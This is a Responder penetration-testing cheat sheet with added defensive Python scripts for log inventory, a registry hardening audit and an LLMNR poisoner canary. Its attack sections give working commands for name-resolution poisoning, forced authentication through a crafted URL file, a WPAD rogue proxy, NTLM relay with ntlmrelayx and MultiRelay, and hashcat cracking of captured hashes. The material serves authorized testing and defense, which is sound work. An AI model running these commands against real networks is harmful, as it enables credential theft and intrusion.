Responder Cheat Sheet
Overview
Responder is an LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service) and mDNS (Multicast DNS) poisoner. It answers selected name-resolution queries on the local segment with its own address and ships with rogue HTTP/SMB/MSSQL/FTP/LDAP authentication servers that accept NTLMv1, NTLMv2 and LMv2 authentication, recording the credentials each client presents.
⚠️ Warning: Responder is a security testing tool that should only be used in environments where you have explicit permission to do so.
Installation
Kali Linux
bash
# Update package list
sudo apt update
# Install if not already installed
sudo apt install responder
From GitHub
bash
# Clone the repository
git clone https://github.com/lgandx/Responder
# Navigate to the directory
cd Responder
# Make the Python script executable
chmod +x Responder.py
Using pip
bash
# Install using pip
pip install Responder
Basic Usage
Starting Responder
bash
# Basic usage with interface specification
responder -I eth0
# Start with all options enabled
responder -I eth0 -wrf
# Analyze mode (passive)
responder -I eth0 -A
Command Line Options
| Option | Description |
|---|---|
| -h, --help | Show help message and exit |
| -A, --analyze | Analyze mode. Do not poison any requests, just analyze traffic |
| -I <interface> | Network interface to use |
| -i <IP> | IP address to bind to |
| -e <IP> | External IP address (for DHCP options) |
| -b, --basic | Return a Basic HTTP authentication. Default: NTLM |
| -r, --wredir | Enable answers for netbios wredir suffix queries |
| -d, --NBTNSdomain | Enable answers for netbios domain suffix queries |
| -f, --fingerprint | Fingerprint hosts that issued an NBT-NS or LLMNR query |
| -w, --wpad | Start the WPAD rogue proxy server |
| -u, --upstream-proxy | Upstream HTTP proxy used by the rogue WPAD proxy |
| -F, --ForceWpadAuth | Force NTLM/Basic authentication on wpad.dat file retrieval |
| -P, --ProxyAuth | Force NTLM/Basic authentication for any proxy request |
| -lm, --LM | Force LM hashing downgrade for Windows XP/2003 and earlier |
| -v, --verbose | Increase verbosity |
| --log-local | Log to file in addition to console |
| -s, --disable-syslog | Do not log to syslog |
| -S, --disable-stdout | Do not log to stdout |
| -c, --config | Path to configuration file |
| --server=SERVER | Enable/disable specific server (HTTP, SMB, etc.) |
| --sql | Enable the MSSQL server |
| --mssql | Enable the MSSQL server |
| --https | Enable the HTTPS server |
| --http | Enable the HTTP server |
| --smb | Enable the SMB server |
| --ftp | Enable the FTP server |
| --imap | Enable the IMAP server |
| --pop | Enable the POP server |
| --smtp | Enable the SMTP server |
| --ldap | Enable the LDAP server |
| --dns | Enable the DNS server |
Configuration File
The configuration file is located at /etc/responder/Responder.conf when Responder was installed from the Kali package, or at Responder.conf inside the Responder directory for a GitHub checkout.
Key Configuration Options
ini
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
Attack Scenarios
Basic LLMNR/NBT-NS Poisoning
bash
# Start Responder with default settings
responder -I eth0 -v
# Wait for authentication attempts
# Hashes will be saved in the logs directory
Forced Authentication via UNC Path
bash
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url
# Start Responder
responder -I eth0 -v
# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
WPAD Attack
bash
# Start Responder with WPAD enabled
responder -I eth0 -w -v
# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
Relay Attack Setup
bash
# First set SMB = Off and HTTP = Off in Responder.conf so that ntlmrelayx can bind those ports
# (Responder has no --disable-http / --disable-smb switches; the servers are toggled in the config file)
responder -I eth0 -v
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
Hash Capture and Cracking
Viewing Captured Hashes
bash
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
# Line format (one authentication per line, NTLMv2):
# USERNAME::DOMAIN:server challenge:NTProofStr:NTLMv2 blob
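As an added example (not part of this cheat sheet and not code from Responder), the following Python parser reads the SMB-NTLMv2-SSP-<IP>.txt files described above and produces what a defender needs once an authorized test is over: which accounts authenticated to the rogue server, and from which client hosts, so those passwords can be reset. It also reports server challenges reused across authentications; a genuine server draws a fresh random 8-byte challenge per session, so a repeated one is a common detection signature for a rogue NTLM server. The log contents below are constructed sample data, and the NTProofStr and blob fields are filler hex, not real responses.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple

# One line of a <PROTO>-NTLMv2-SSP-<IP>.txt file: USER::DOMAIN:challenge:NTProofStr:blob
NTLMV2_LINE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-fA-F]{16}):"
    r"(?P<proof>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)$"
)
# Log file name as Responder writes it: <PROTO>-NTLMv2-SSP-<client IP>.txt
LOG_NAME = re.compile(r"^(?P<proto>[A-Za-z]+)-NTLMv2(?:-SSP)?-(?P<ip>[\d.]+)\.txt$")


class Capture(NamedTuple):
    protocol: str
    client_ip: str
    user: str
    domain: str
    challenge: str


def parse_capture_file(filename: str, text: str) -> List[Capture]:
    """Parse one Responder log file into Capture records; malformed lines are skipped."""
    m = LOG_NAME.match(filename)
    if not m:
        raise ValueError(f"not a Responder NTLMv2 log name: {filename}")
    captures = []
    for line in text.splitlines():
        hit = NTLMV2_LINE.match(line.strip())
        if hit:
            captures.append(Capture(m["proto"].upper(), m["ip"], hit["user"],
                                    hit["domain"].upper(), hit["challenge"].lower()))
    return captures


def exposed_accounts(captures: List[Capture]) -> Dict[str, List[str]]:
    """Map DOMAIN\\user -> sorted client IPs it authenticated from (the reset list)."""
    acct = defaultdict(set)
    for c in captures:
        acct[f"{c.domain}\\{c.user}"].add(c.client_ip)
    return {k: sorted(v) for k, v in sorted(acct.items())}


def reused_challenges(captures: List[Capture]) -> List[str]:
    """Server challenges seen in more than one authentication (fixed-challenge indicator)."""
    seen = defaultdict(int)
    for c in captures:
        seen[c.challenge] += 1
    return sorted(ch for ch, n in seen.items() if n > 1)


def analyze(logs: Dict[str, str]) -> Dict[str, object]:
    """Run the inventory over a mapping of file name -> file contents."""
    captures = [c for name, text in logs.items() for c in parse_capture_file(name, text)]
    return {
        "captures": len(captures),
        "accounts": exposed_accounts(captures),
        "reused_challenges": reused_challenges(captures),
    }


# Constructed sample logs (filler hex, not real NTLM responses)
SAMPLE_LOGS = {
    "SMB-NTLMv2-SSP-192.168.1.20.txt": "\n".join([
        "jdoe::CORP:1122334455667788:" + "a" * 32 + ":0101" + "0" * 60,
        "svc_backup::CORP:1122334455667788:" + "b" * 32 + ":0101" + "1" * 60,
    ]),
    "HTTP-NTLMv2-SSP-192.168.1.31.txt": "\n".join([
        "jdoe::CORP:1122334455667788:" + "c" * 32 + ":0101" + "2" * 60,
        "garbage line that does not parse",
    ]),
}

if __name__ == "__main__":
    report = analyze(SAMPLE_LOGS)
    print(f"{report['captures']} authentications captured")
    for account, hosts in report["accounts"].items():
        print(f"reset {account}: seen from {', '.join(hosts)}")
    for ch in report["reused_challenges"]:
        print(f"challenge {ch} reused: fixed-challenge rogue server")
```

To use it on a real engagement log directory, build the mapping with the file names from /usr/share/responder/logs and their contents; the parser keys on the file name for protocol and client IP, so keep the names as Responder wrote them.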
Cracking with Hashcat
bash
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist
# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
Advanced Techniques
Using Responder with MultiRelay
bash
# First set SMB = Off and HTTP = Off in Responder.conf so that MultiRelay can bind those ports
responder -I eth0 -v
# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
Poisoning Specific Hosts
ini
; Responder.conf: answer only these hosts (comma-separated, ranges allowed; blank = all)
; -e takes an IP address, not a target file, so the restriction is done here
[Responder Core]
RespondTo = 192.168.1.10
bash
# Start Responder; only the hosts listed in RespondTo are poisoned
responder -I eth0 -v
Custom Challenge Value
ini
; Responder.conf: challenge the rogue servers send to every client
[Responder Core]
Challenge = 1122334455667788
Defensive Measures
Disabling LLMNR via Group Policy
- Open Group Policy Editor
- Navigate to Computer Configuration > Administrative Templates > Network > DNS Client
- Enable "Turn off multicast name resolution"
Disabling NBT-NS via Command Line
cmd
REM Disable NetBIOS over TCP/IP on every adapter still on the default/DHCP setting (run as Administrator)
wmic nicconfig where TcpipNetbiosOptions=0 call SetTcpipNetbios 2
Disabling NBT-NS via Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (REG_DWORD; P-node resolves NetBIOS names through WINS only and never broadcasts NBT-NS queries)
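To verify that the measures above actually took effect on a host, here is an added Python audit (not from the cheat sheet, not a Responder tool) that reads the relevant registry values and evaluates them. It relies on three facts: the policy "Turn off multicast name resolution" writes EnableMulticast=0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient; NodeType=2 under NetBT\Parameters selects P-node; and NetbiosOptions=2 under NetBT\Parameters\Interfaces\Tcpip_{GUID} disables NetBIOS over TCP/IP on that adapter. read_settings() works only on Windows; assess() is pure logic and can be run anywhere on values collected elsewhere.

```python
from typing import Dict, Optional

try:
    import winreg  # Windows only; assess() below does not need it
except ImportError:
    winreg = None

# Registry locations behind the three hardening measures
LLMNR_POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\DNSClient"   # EnableMulticast
NETBT_PARAMS_KEY = r"SYSTEM\CurrentControlSet\Services\NetBT\Parameters"  # NodeType, Interfaces\*\NetbiosOptions


def _read_dword(root, path: str, name: str) -> Optional[int]:
    """Return a REG_DWORD value, or None if key/value is absent (default behaviour applies)."""
    try:
        with winreg.OpenKey(root, path) as key:
            data, kind = winreg.QueryValueEx(key, name)
        return int(data) if kind == winreg.REG_DWORD else None
    except OSError:
        return None


def read_settings() -> Dict[str, object]:
    """Collect the live settings from the local machine (Windows only)."""
    if winreg is None:
        raise RuntimeError("read_settings() requires Windows (winreg module)")
    hklm = winreg.HKEY_LOCAL_MACHINE
    per_iface: Dict[str, Optional[int]] = {}
    try:
        with winreg.OpenKey(hklm, NETBT_PARAMS_KEY + r"\Interfaces") as ifaces:
            index = 0
            while True:
                try:
                    sub = winreg.EnumKey(ifaces, index)
                except OSError:  # no more subkeys
                    break
                per_iface[sub] = _read_dword(hklm, f"{NETBT_PARAMS_KEY}\\Interfaces\\{sub}", "NetbiosOptions")
                index += 1
    except OSError:
        pass
    return {
        "EnableMulticast": _read_dword(hklm, LLMNR_POLICY_KEY, "EnableMulticast"),
        "NodeType": _read_dword(hklm, NETBT_PARAMS_KEY, "NodeType"),
        "NetbiosOptions": per_iface,
    }


def assess(settings: Dict[str, object]) -> Dict[str, object]:
    """LLMNR is off only when the policy value is exactly 0. NBT-NS broadcasts are
    prevented either globally by P-node (NodeType=2) or by NetbiosOptions=2 on
    every interface; a missing value means the Windows default (enabled)."""
    llmnr_off = settings.get("EnableMulticast") == 0
    per_iface = settings.get("NetbiosOptions") or {}
    nbt_off_everywhere = bool(per_iface) and all(v == 2 for v in per_iface.values())
    nbtns_off = settings.get("NodeType") == 2 or nbt_off_everywhere
    findings = []
    if not llmnr_off:
        findings.append("LLMNR still enabled: apply 'Turn off multicast name resolution' (EnableMulticast=0)")
    if not nbtns_off:
        findings.append("NBT-NS broadcasts still possible: set NodeType=2 (P-node) or NetbiosOptions=2 on each interface")
    return {"llmnr_disabled": llmnr_off, "nbtns_disabled": nbtns_off, "findings": findings}


if __name__ == "__main__":
    result = assess(read_settings())
    for line in result["findings"] or ["OK: LLMNR and NBT-NS poisoning surface closed"]:
        print(line)
```

Run it as an administrator on a domain-joined workstation after a gpupdate to confirm the policy landed; a non-empty findings list is the remediation to-do for that host.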
Detecting Responder Activity
- Watch for LLMNR/NBT-NS/mDNS responses on the segment to names that should never resolve (a mistyped or non-existent hostname): a healthy network returns nothing, a poisoner answers
- Look for one IP that suddenly offers many services (SMB, HTTP, LDAP, FTP, MSSQL ...) that are not part of its normal role
- Check for unusual authentication attempts, such as NTLM logons from workstations to a host that is not a server
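As an added example (not the cheat sheet's own code and not part of Responder), the following Python script implements the first check above as a canary: it sends one LLMNR query for a random name that cannot exist, so any answer at all comes from a host willing to poison. The builder and parser follow the LLMNR wire format (RFC 4795: DNS-style messages on UDP 5355 to 224.0.0.252). build_sample_response() is a constructed reply used for offline testing; probe() needs an interface on the segment being checked and is not exercised by the test.

```python
import random
import socket
import string
import struct
from typing import List, Tuple

# LLMNR (RFC 4795) reuses the DNS message format on UDP 5355, multicast group 224.0.0.252
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355


def encode_name(name: str) -> bytes:
    """Encode a hostname as DNS labels (length-prefixed, NUL-terminated)."""
    out = b""
    for label in name.split("."):
        if label:
            raw = label.encode("ascii")
            out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(data: bytes, offset: int) -> Tuple[str, int]:
    """Decode a possibly compressed name; return (name, offset just after the name field)."""
    labels = []
    end = None
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # compression pointer (2 bytes, 14-bit offset)
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2
            offset = pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), end if end is not None else offset


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Standard query for an A record: flags=0, QDCOUNT=1, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_llmnr_response(data: bytes, expected_txid: int) -> List[str]:
    """Return the IPv4 addresses claimed in the answer section, or [] if the
    datagram is not a response (QR bit) to our transaction ID or is malformed."""
    try:
        txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
        if txid != expected_txid or not (flags & 0x8000):
            return []
        offset = 12
        for _ in range(qdcount):  # skip the echoed question(s)
            _, offset = decode_name(data, offset)
            offset += 4  # QTYPE + QCLASS
        addrs = []
        for _ in range(ancount):
            _, offset = decode_name(data, offset)
            rtype, _, _, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
            offset += 10
            if rtype == 1 and rdlen == 4:
                addrs.append(socket.inet_ntoa(data[offset:offset + 4]))
            offset += rdlen
        return addrs
    except (IndexError, struct.error):
        return []


def build_sample_response(name: str, txid: int, claimed_ip: str) -> bytes:
    """Constructed sample of what a poisoner sends back (offline testing only)."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(claimed_ip)
    return header + question + answer


def probe(timeout: float = 2.0) -> List[Tuple[str, List[str]]]:
    """Query a random non-existent name and collect every answer as
    (responder_ip, [claimed addresses]). Anything returned is a poisoner candidate."""
    name = "canary-" + "".join(random.choices(string.ascii_lowercase, k=8))
    txid = random.randrange(1, 0xFFFF)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                data, (src, _) = sock.recvfrom(1024)
                claimed = parse_llmnr_response(data, txid)
                if claimed:
                    hits.append((src, claimed))
        except socket.timeout:
            pass
    return hits


if __name__ == "__main__":
    for src, claimed in probe():
        print(f"ALERT: {src} answered LLMNR for a non-existent name, claiming {claimed}")
```

Scheduled from a monitoring host on each VLAN, this gives a cheap standing check; the responder's source IP is the host to investigate, and the claimed address (normally the same IP) is where victims would have been sent.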
Troubleshooting
Common Issues
Port Conflicts
bash
# Check whether the ports Responder needs are already bound (match the port exactly, not 8080 or 5353)
sudo netstat -tulpn | grep -E ':(445|80|53)\s'
# Kill the conflicting process
sudo kill <PID>
Interface Not Found
bash
# List available interfaces
ip a
# Use the correct interface name
responder -I <correct_interface>
Permission Issues
bash
# Run with sudo (Responder binds privileged ports and raw sockets)
sudo responder -I eth0
No Hashes Captured
bash
# Check that Responder is not running in analyze mode (-A answers nothing)
# Ensure the network allows the required traffic
# Try forcing authentication with UNC paths
Resources
This cheat sheet provides a comprehensive reference for using Responder in security testing scenarios. Always ensure you have proper authorization before using this tool in any environment.